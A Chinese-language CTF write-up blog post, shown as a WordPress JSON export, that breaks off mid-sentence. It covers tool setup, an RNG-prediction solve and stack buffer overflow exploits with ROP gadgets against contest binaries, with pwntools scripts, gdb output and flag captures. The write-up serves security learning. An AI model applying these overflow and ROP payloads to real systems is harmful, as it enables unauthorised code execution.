{"id":1473,"date":"2020-05-05T01:40:15","date_gmt":"2020-05-04T17:40:15","guid":{"rendered":"https:\/\/cf.mnihyc.com\/blog\/?p=1473"},"modified":"2020-05-05T17:46:43","modified_gmt":"2020-05-05T09:46:43","slug":"%e8%8f%9c%e9%b8%a1%e9%a6%96%e5%8f%91-ctf-%e9%83%a8%e5%88%86-writeup-%e5%ad%a6%e4%b9%a0%e7%bb%8f%e9%aa%8c","status":"publish","type":"post","link":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473","title":{"rendered":"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &#038; \u5b66\u4e60\u7ecf\u9a8c"},"content":{"rendered":"<p>\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684<em>\u7fa4\u53cb<\/em><strong>\u5173\u7cfb<\/strong>\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f<span style=\"text-decoration: underline;\">\u62db\u65b0<\/span>\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002<\/p>\n<p>\u840c\u65b0\u83dc\u9e21\u9996\u53d1 CTF\uff0c\u9898\u76ee\u6bd4\u8f83\u7b80\u5355<del>\uff0c\u800c\u4e14\u8fd8\u6ca1\u6709 AK<\/del>\uff0c\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u6b65\uff08<\/p>\n<p><span style=\"color: #ffffff;\">\u8fd8\u6709 %%%%%% rxz mcfx<\/span><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>&nbsp;<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>\n<h3><strong>\u76ee\u5f55<\/strong><\/h3>\n<ul>\n<li><a href=\"#t_pre\"><strong>\u73af\u5883\u51c6\u5907<\/strong><\/a><\/li>\n<li>pwn &#8211;<strong><a href=\"#t_game\">game<\/a><\/strong><\/li>\n<li>pwn &#8211; <a href=\"#t_pwn-1-3-1\"><strong>pwn-1-3-1<\/strong><\/a><\/li>\n<li>pwn &#8211; <a href=\"#t_pwn-1-3-1-1\"><strong>pwn-1-3-1-1<\/strong><\/a><\/li>\n<li>misc &#8211; <a href=\"#t_yankee_with_no_brim\"><strong>Yankee with no brim<\/strong><\/a><\/li>\n<li>crypto &#8211; <a href=\"#t_base64\"><strong>\u7533\u5fc5base64<\/strong><\/a><\/li>\n<li>crypto &#8211; <a href=\"#t_rsa-1\"><strong>RSA-1<\/strong><\/a><\/li>\n<li><a href=\"#t_end\"><strong>\u5c3e\u8a00<\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>\u4ee5\u4e0a\u7a0b\u5e8f\u90fd\u53ef\u4ee5\u5728 <span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ctf1pack.zip\">ctf1pack<\/a><\/span> \u4e0b\u8f7d\u5230~<\/p>\n<p><a id=\"t_pre\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>\u73af\u5883\u51c6\u5907<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u9996\u5148\u6211\u4eec\u9700\u8981\u4e00\u53f0 Windows \uff08\u7528\u6765\u8fd0\u884c\u4e00\u4e9b\u5de5\u5177\uff0c\u6bd4\u5982 <a href=\"https:\/\/dl.mnihyc.com\/Tools\/IDA\"><span style=\"color: #0000ff;\">IDA<\/span><\/a> \u3001<a href=\"https:\/\/dl.mnihyc.com\/Tools\/010EditorPortable.zip\"><span style=\"color: #0000ff;\">010Editor<\/span><\/a> \u7b49\uff09\uff0c\u548c\u4e00\u53f0 Linux\uff08\u7528\u6765\u5199\u811a\u672c\uff09\u3002\u6211\u4f7f\u7528\u7684\u662f Windows10 x64 + Ubuntu 18.04 amd64\u3002<\/p>\n<p>\u9996\u5148\u6211\u4eec\u9700\u8981\u5728 Ubuntu \u4e0a\u88c5\u4e00\u4e9b\u597d\u7528\u7684\u5de5\u5177\uff0cpython3 \u662f\u80af\u5b9a\u5f97\u5148\u641e\u4e0a\u7684<\/p>\n<pre class=\"lang:default decode:true\">sudo apt install python3 python3-pip\r\npython3 -m pip install --upgrade pip<\/pre>\n<p>\u7136\u540e\u6211\u4eec\u88c5\u4e0a\u4e07\u80fd\u7684 pwntools<\/p>\n<pre class=\"lang:default decode:true\">python3 -m pip install --upgrade git+https:\/\/github.com\/Gallopsled\/pwntools.git@dev3<\/pre>\n<p>\u518d\u88c5\u4e0a\u8c03\u8bd5\u795e\u5668 gdb-peda<\/p>\n<pre class=\"lang:default decode:true \">sudo apt install gdb\r\ngit clone https:\/\/github.com\/longld\/peda.git ~\/peda\r\necho \"source ~\/peda\/peda.py\" &gt;&gt; ~\/.gdbinit<\/pre>\n<p>\u63a5\u7740\u88c5\u4e0a ROPgadget<\/p>\n<pre class=\"lang:default decode:true\">cd \/tmp\r\n# Check and download the latest version by yourself\r\nwget https:\/\/github.com\/JonathanSalwan\/ROPgadget\/archive\/v6.3.zip\r\nunzip v6.3.zip\r\nsudo python3 ROPgadget-6.3\/setup.py install\r\n# The installation failed for me, so I needed to copy files manually\r\nsudo cp -r ROPgadget-6.3\/scripts \/home\/mnihyc\/.local\/lib\/python3.6\/site-packages\/ROPGadget-6.3.dist-info\/<\/pre>\n<p>\u7ee7\u7eed\u5b89\u88c5 binwalk \u53ca foremost<\/p>\n<pre class=\"lang:default decode:true \">cd \/tmp\r\ngit clone https:\/\/github.com\/ReFirmLabs\/binwalk\r\ncd binwalk\r\nsudo python3 setup.py install\r\n\r\nsudo apt install foremost<\/pre>\n<p>\u6700\u540e\u5b89\u88c5 requests \u548c gmpy2\uff08pycryptodome\uff09~~~<\/p>\n<pre class=\"lang:default decode:true \">pip3 install requests\r\npip3 install pycryptodome<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_game\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>pwn &#8211; game<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p><span class=\"challenge-desc\">\u73a9\u77f3\u5934\u526a\u5200\u5e03\uff0c\u8d62 100 \u6b21\u62ff\u5230 flag\u3002<br \/>\n<\/span><\/p>\n<pre class=\"lang:default decode:true\" title=\"game.c\">#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;time.h&gt;\r\n\r\nvoid printWelcomeMsg() {\r\n    puts(\"Are you good at the game `Rock, Paper, Scissors`?\");\r\n    puts(\"I'm going to play the game 100 times with you, and only if you win 100 times, I will give you the flag.\");\r\n    puts(\"That's quite easy, isn't it?\");\r\n    puts(\"\");\r\n    puts(\"input: 0 = Rock, 1 = Paper, 2 = Scissors\");\r\n    fflush(stdout);\r\n}\r\n\r\nvoid printFlag() {\r\n    puts(getenv(\"flag\"));\r\n    fflush(stdout);\r\n}\r\n\r\nint getInput() {\r\n    char s[100];\r\n    scanf(\"%s\", s);\r\n    char ch = s[0];\r\n\r\n    if(ch &lt; '0' || ch &gt; '2') {\r\n        puts(\"Oh, input is invalid.\");\r\n        exit(1);\r\n    }\r\n\r\n    return ch - '0';\r\n}\r\n\r\n\/\/ Linux\u4e0b\u7684rand()\u4e0eWindows\u4e0b\u7684rand()\u8868\u73b0\u4e0d\u540c\u3002\r\n\/\/ \u4e3a\u4e86\u9632\u6b62\u5751\u9009\u624b\uff0c\u6211\u4eec\u81ea\u5df1\u9020\u4e86\u4e00\u4e2arand.\r\n\r\nint num = 0;\r\n\r\nint myRand() {\r\n    num = (num * num + 233) % 23333;\r\n    return num;\r\n}\r\n\r\nvoid mySrand(unsigned int seed) {\r\n    num = seed;\r\n}\r\n\r\nint playOnce() {\r\n    printf(\"Input your choice&gt; \");\r\n    fflush(stdout);\r\n\r\n    int ai = myRand() % 3;\r\n    int player = getInput();\r\n\r\n    if(player == 1 &amp;&amp; ai == 0)\r\n        return 1;\r\n    if(player == 2 &amp;&amp; ai == 1)\r\n        return 1;\r\n    if(player == 0 &amp;&amp; ai == 2)\r\n        return 1;\r\n    \r\n    return 0;\r\n}\r\n\r\nvoid work() {\r\n    mySrand(time(0) % 10);\r\n\r\n    for(int x=0; x&lt;100; x++)\r\n        if(playOnce()) {\r\n            printf(\"nice try (%d\/100)\\n\", x+1);\r\n            fflush(stdout);\r\n        }\r\n        else {\r\n            puts(\"Oh no... You failed.\");\r\n            fflush(stdout);\r\n            exit(0);\r\n        }\r\n    \r\n    printFlag();\r\n}\r\n\r\nint main(void) {\r\n    printWelcomeMsg();\r\n\r\n    work();\r\n\r\n    return 0;\r\n}\r\n<\/pre>\n<p>\u89c2\u5bdf\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u79cd\u5b50\u662f time(0)%10 \uff0c\u5373\u53ea\u8981\u5f97\u5230\u76f8\u540c\u7684 time \u5219\u540e\u9762\u968f\u673a\u751f\u6210\u7684\u6570\u90fd\u662f\u53ef\u4ee5\u7b97\u51fa\u6765\u7684\u3002<\/p>\n<p>\u8fd9\u6837\u5c31\u80fd\u505a\u5230\u7a33\u8d62 100 \u6b21\u4e86<\/p>\n<p>\u7136\u800c\u518d\u6572\u4e00\u4e2a C\u8279 \u6765\u5b9e\u73b0\u8fd9\u4e2a\u8fc7\u7a0b\u662f\u975e\u5e38\u4ee4\u4eba\u5d29\u6e83\u7684\uff0c\u8fd9\u65f6\u5019 python3 + pwntools \u5c31\u662f\u7edd\u914d\u4e86\uff01<\/p>\n<pre class=\"lang:default decode:true\">from pwn import *\r\nimport time\r\nprint(time.time())\r\nc=remote('xxx.xxx.xxx.xxx',30003)\r\nnum=int(time.time()\/1000)%10\r\nfor i in range(0,100):\r\n    num = (num * num + 233) % 23333\r\n    ai=num%3\r\n    if ai==0:\r\n        c.sendline('1')\r\n    elif ai==1:\r\n        c.sendline('2')\r\n    else:\r\n        c.sendline('0')\r\n    print(c.recvline())\r\nc.interactive()\r\n<\/pre>\n<p>\u77ed\u77ed\u51e0\u884c\u8fc7\u540e\uff0c\u6211\u4eec\u6210\u529f\u62ff\u5230\u4e86 flag<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 120.py\r\n1588437515.9302742\r\n[+] Opening connection to xxx.xxx.xxx.xxx on port 30003: Done\r\nb'Are you good at the game `Rock, Paper, Scissors`?\\n'\r\nb\"I'm going to play the game 100 times with you, and only if you win 100 times, I will give you the flag.\\\"\r\nb\"That's quite easy, isn't it?\\n\"\r\nb'\\n'\r\nb'input: 0 = Rock, 1 = Paper, 2 = Scissors\\n'\r\nb'Input your choice&gt; nice try (1\/100)\\n'\r\nb'Input your choice&gt; nice try (2\/100)\\n'\r\nb'Input your choice&gt; nice try (3\/100)\\n'\r\nb'Input your choice&gt; nice try (4\/100)\\n'\r\nb'Input your choice&gt; nice try (5\/100)\\n'\r\nb'Input your choice&gt; nice try (6\/100)\\n'\r\nb'Input your choice&gt; nice try (7\/100)\\n'\r\nb'Input your choice&gt; nice try (8\/100)\\n'\r\n(\u4e2d\u95f4\u7701\u7565)\r\nb'Input your choice&gt; nice try (95\/100)\\n'\r\n[*] Switching to interactive mode\r\nInput your choice&gt; nice try (96\/100)\r\nInput your choice&gt; nice try (97\/100)\r\nInput your choice&gt; nice try (98\/100)\r\nInput your choice&gt; nice try (99\/100)\r\nInput your choice&gt; nice try (100\/100)\r\nflag{pwntools_is_so_useful}\r\n[*] Got EOF while reading in interactive\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_pwn-1-3-1\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>pwn &#8211; pwn-1-3-1<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u53ea\u6709\u4e00\u4e2a LSB \u6587\u4ef6\uff0c\u6253\u5f00 IDA \u628a\u5b83\u6254\u8fdb\u53bb<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1481\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png\" alt=\"\" width=\"500\" height=\"216\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png 500w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H-300x130.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H-150x65.png 150w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/p>\n<p>\u53d1\u73b0 buf \u53ea\u6709 256byte\uff0c\u800c read \u4e00\u4e0b\u8bfb\u4e86 0x200uLL \u8fdb\u6765\uff0c\u662f\u4e2a\u5178\u578b\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\u3002<\/p>\n<p>\u540c\u65f6\u5728\u51fd\u6570\u5217\u8868\u4e2d\u53d1\u73b0 get_flag()\uff0c\u4e00\u4e2a F5 \u4e0b\u53bb\u770b\u770b<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1482\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC.png\" alt=\"\" width=\"352\" height=\"223\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC.png 352w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC-300x190.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC-150x95.png 150w\" sizes=\"auto, (max-width: 352px) 100vw, 352px\" \/><\/p>\n<p>\u610f\u601d\u5c31\u662f\u53ea\u8981\u63a7\u5236\u7a0b\u5e8f\u6267\u884c\u5230 get_flag() \u5c31\u53ef\u4ee5\u6210\u529f\u62ff\u5230 flag<\/p>\n<p>\u7528 checksec \u7b49\u67e5\u770b\u7a0b\u5e8f\u7684\u4fe1\u606f<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 -c 'from pwn import *; ELF(\"pwn-1-3-1\");'\r\n[*] '\/tmp\/pwn-1-3-1'\r\n    Arch:     amd64-64-little\r\n    RELRO:    Partial RELRO\r\n    Stack:    No canary found\r\n    NX:       NX enabled\r\n    PIE:      No PIE (0x400000)\r\n<\/pre>\n<p>\u53d1\u73b0\u542f\u7528\u4e86 NX\uff08DEP\uff09\uff0c\u6240\u4ee5\u65e0\u6cd5\u63d2\u5165 shellcode\uff0c\u6545\u4f7f\u7528 ROP \u7c7b\u65b9\u6cd5\u3002<\/p>\n<p>\u540c\u65f6\u53d1\u73b0\u6ca1\u6709\u5f00 PIE\uff08\u975e ASLR\uff09\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u63d2\u51fd\u6570\u5730\u5740\u8fdb\u53bb\u3002<\/p>\n<p>\u5728 IDA \u91cc\u627e\u5230\u5bfc\u51fa\u51fd\u6570\u7684\u5730\u5740\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1483\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5.png\" alt=\"\" width=\"625\" height=\"108\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5.png 625w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5-300x52.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5-150x26.png 150w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/p>\n<p>\u7136\u540e\u4f7f\u7528 gdb-peda \u627e\u5230\u4f7f\u7f13\u51b2\u533a\u6ea2\u51fa\u81f3 $RSP\uff08\u6ea2\u51fa\u65f6\u6307\u5411 $RIP\uff09 \u9700\u8981\u7684\u5b57\u8282\u6570<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@proxy4:\/tmp$ gdb\r\nGNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git\r\ngdb-peda$ pattern_create 400 in.txt\r\nWriting pattern of 400 chars to filename \"in.txt\"\r\ngdb-peda$ file pwn-1-3-1\r\nReading symbols from pwn-1-3-1...done.\r\ngdb-peda$ r &lt; in.txt\r\nStarting program: \/tmp\/pwn-1-3-1 &lt; in.txt\r\n\u8bf7\u5f00\u59cb\u4f60\u7684\u8868\u6f14:\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x0\r\nRBX: 0x0\r\nRCX: 0x15555504b081 (&lt;__GI___libc_read+17&gt;:     cmp    rax,0xfffffffffffff000)\r\nRDX: 0x200\r\nRSI: 0x7fffffffe360 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA\"...)\r\nRDI: 0x0\r\nRBP: 0x3425416525414925 ('%IA%eA%4')\r\nRSP: 0x7fffffffe478 (\"A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\nRIP: 0x4007fa (&lt;main+99&gt;:       ret)\r\nR8 : 0x16\r\nR9 : 0x1555555474c0 (0x00001555555474c0)\r\nR10: 0x3\r\nR11: 0x246\r\nR12: 0x400610 (&lt;_start&gt;:        xor    ebp,ebp)\r\nR13: 0x7fffffffe550 --&gt; 0x1\r\nR14: 0x0\r\nR15: 0x0\r\nEFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x4007ef &lt;main+88&gt;:  call   0x4005c0 &lt;read@plt&gt;\r\n   0x4007f4 &lt;main+93&gt;:  mov    eax,0x0\r\n   0x4007f9 &lt;main+98&gt;:  leave\r\n=&gt; 0x4007fa &lt;main+99&gt;:  ret\r\n   0x4007fb:    nop    DWORD PTR [rax+rax*1+0x0]\r\n   0x400800 &lt;__libc_csu_init&gt;:  push   r15\r\n   0x400802 &lt;__libc_csu_init+2&gt;:        push   r14\r\n   0x400804 &lt;__libc_csu_init+4&gt;:        mov    r15d,edi\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0x7fffffffe478 (\"A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0008| 0x7fffffffe480 (\"5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0016| 0x7fffffffe488 (\"%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0024| 0x7fffffffe490 (\"A%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0032| 0x7fffffffe498 (\"iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0040| 0x7fffffffe4a0 (\"%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0048| 0x7fffffffe4a8 (\"A%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0056| 0x7fffffffe4b0 (\"lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x00000000004007fa in main () at pwn5.c:32\r\n32      pwn5.c: No such file or directory.\r\ngdb-peda$ x\/wx $rsp\r\n0x7fffffffe478: 0x414a2541\r\ngdb-peda$ pattern offset 0x414a2541\r\n1095378241 found at offset: 280\r\ngdb-peda$\r\n<\/pre>\n<p>\u4e8e\u662f\u76f4\u63a5\u8986\u76d6 $RSP \uff08$RIP\uff09\u81f3 get_flag() \u7684\u51fd\u6570\u5730\u5740\uff0c\u5c31\u53ef\u4ee5\u62ff\u5230 flag \u4e86\uff01<\/p>\n<pre class=\"lang:default decode:true \">from pwn import *\r\n\r\nc=remote('xxx.xxx.xxx.xxx',4005)\r\np=b'C'*280 + p64(0x0000000000400728)\r\nc.recvline()\r\nc.sendline(p)\r\nc.interactive()\r\n<\/pre>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 4005.py\r\n[+] Opening connection to xxx.xxx.xxx.xxx on port 4005: Done\r\n[*] Switching to interactive mode\r\nncongrats, here is the flag\r\nflag{It_1s_amazing_to_overwrite_return_address}\r\ntql!!!\r\n[*] Got EOF while reading in interactive<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_pwn-1-3-1-1\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>pwn &#8211; pwn-1-3-1-1<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u540c\u6837\uff0c\u62ff\u5230 ELF 64-bit LSB executable \u540e\u76f4\u63a5\u6254\u8fdb IDA \u5e76\u4e14 F5<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1486\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP.png\" alt=\"\" width=\"500\" height=\"219\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP.png 500w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP-300x131.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP-150x66.png 150w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/p>\n<p>\u8fd9\u4e2a main() \u597d\u50cf\u6ca1\u5565\u533a\u522b\uff0c\u540c\u6837\u8fdb\u5165 get_flag()<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1487\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2.png\" alt=\"\" width=\"353\" height=\"245\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2.png 353w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2-300x208.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2-150x104.png 150w\" sizes=\"auto, (max-width: 353px) 100vw, 353px\" \/><\/p>\n<p>\u53d1\u73b0\u8fd9\u4e2a\u51fd\u6570\u73b0\u5728\u5e26\u4e86\u4e2a\u53c2\u6570\uff0c\u800c\u4e14\u8fd8\u5f97\u901a\u8fc7 validate() \u7684\u9a8c\u8bc1<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1488\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O.png\" alt=\"\" width=\"326\" height=\"92\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O.png 326w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O-300x85.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O-150x42.png 150w\" sizes=\"auto, (max-width: 326px) 100vw, 326px\" \/><\/p>\n<p>\u7136\u800c\u8fd9\u4e2a\u9a8c\u8bc1\u5b9e\u9645\u4e0a\u6ca1\u5565\u7528\uff08\uff08\uff0c\u56e0\u4e3a\u6211\u4eec\u60f3\u8981\u7684 flag \u5728 .\/flag \u5904<\/p>\n<p>\u6240\u4ee5\u73b0\u5728\u7684\u95ee\u9898\u662f\u5982\u4f55\u4f7f\u7a0b\u5e8f\u6267\u884c\u5230 get_flag() \uff0c\u5e76\u5e26\u4e2a\u53c2\u6570 path=&#8221;.\/flag&#8221; \uff1f<\/p>\n<p>\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\u7684\u662f x86 \u4e0b\u51fd\u6570\u7684\u53c2\u6570\u4f20\u9012\u5b8c\u5168\u9760\u7684\u662f\u4ece\u53f3\u5230\u5de6\u7684\u6808\u64cd\u4f5c\uff0c\u800c amd64 \u4e0b\u53c2\u6570\u7684\u4f20\u9012\u9996\u5148\u9760\u7684\u662f $RDI\u3001$RSI\u3001$RDX\u3001$RCX\u3001$R8\u3001$R9 \u8fd9\u516d\u4e2a\u5bc4\u5b58\u5668\uff0c\u5b58\u6ee1\u4e86\u624d\u5f00\u59cb\u7528\u6808\u64cd\u4f5c\u3002<\/p>\n<p>\u6240\u4ee5\u8981\u63a7\u5236 get_flag() \u4e2d\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570 path\uff0c\u5c31\u662f\u8981\u63a7\u5236 $RDI\u3002<\/p>\n<p>\u4f7f\u7528 ROPgadget \u67e5\u627e pop rdi; ret \u7684\u64cd\u4f5c\uff0c\u62ff\u6765\u505a gadget\u3002<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ ROPgadget --binary .\/pwn-1-3-1-1 --only \"pop|ret\"\r\nGadgets information\r\n============================================================\r\n0x00000000004008fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret\r\n0x00000000004008fe : pop r13 ; pop r14 ; pop r15 ; ret\r\n0x0000000000400900 : pop r14 ; pop r15 ; ret\r\n0x0000000000400902 : pop r15 ; ret\r\n0x00000000004008fb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret\r\n0x00000000004008ff : pop rbp ; pop r14 ; pop r15 ; ret\r\n0x00000000004006b0 : pop rbp ; ret\r\n0x0000000000400903 : pop rdi ; ret\r\n0x0000000000400901 : pop rsi ; pop r15 ; ret\r\n0x00000000004008fd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret\r\n0x00000000004005a9 : ret\r\n\r\nUnique gadgets found: 11\r\n<\/pre>\n<p>\u6210\u529f\u627e\u5230 pop rdi; ret\uff0c\u5728 0x0000000000400903 \u5904<\/p>\n<p>\u6ce8\u610f\uff0cpop rdi \u4ec5\u662f\u628a\u5806\u6808\u4e2d\u5b57\u7b26\u4e32\u7684\u5730\u5740 pop \u5230 $RDI\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u6709\u4e00\u5757\u5185\u5b58\u533a\u57df\u5b58\u653e\u5b57\u7b26\u4e32 &#8220;.\/flag&#8221;<\/p>\n<p>\u800c\u5e78\u8fd0\u7684\u662f\uff0c\u7a0b\u5e8f\u91cc\u81ea\u5e26\u4e86\u8fd9\u4e2a\u5b57\u7b26\u4e32<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 -c 'from pwn import *; e=ELF(\"pwn-1-3-1-1\"); \\\r\nprint(\"%x\"%next(e.search(b\".\/flag\")))'\r\n[*] '\/tmp\/pwn-1-3-1-1'\r\n    Arch:     amd64-64-little\r\n    RELRO:    Partial RELRO\r\n    Stack:    No canary found\r\n    NX:       NX enabled\r\n    PIE:      No PIE (0x400000)\r\n40093e\r\n<\/pre>\n<p>$RSP \u5728 ret \u540e\u4ece\u6307\u5411 $RIP\uff08\u88ab\u4fee\u6539\u4e3a pop rdi; ret \u7684\u5730\u5740\uff09\u4e0a\u79fb\uff0c\u5e76\u4e14\u6267\u884c pop \u540e\u7ee7\u7eed\u4e0a\u79fb\u5230\u4e86\u65b0\u7684 $RIP\uff08\u88ab\u4fee\u6539\u4e3a get_flag() \u7684\u5730\u5740\uff09\uff0c\u800c\u540e\u6267\u884c ret \u5e76\u8f6c\u8df3\u6267\u884c\u3002<\/p>\n<p>\u6700\u540e\u6839\u636e pwn-1-3-1 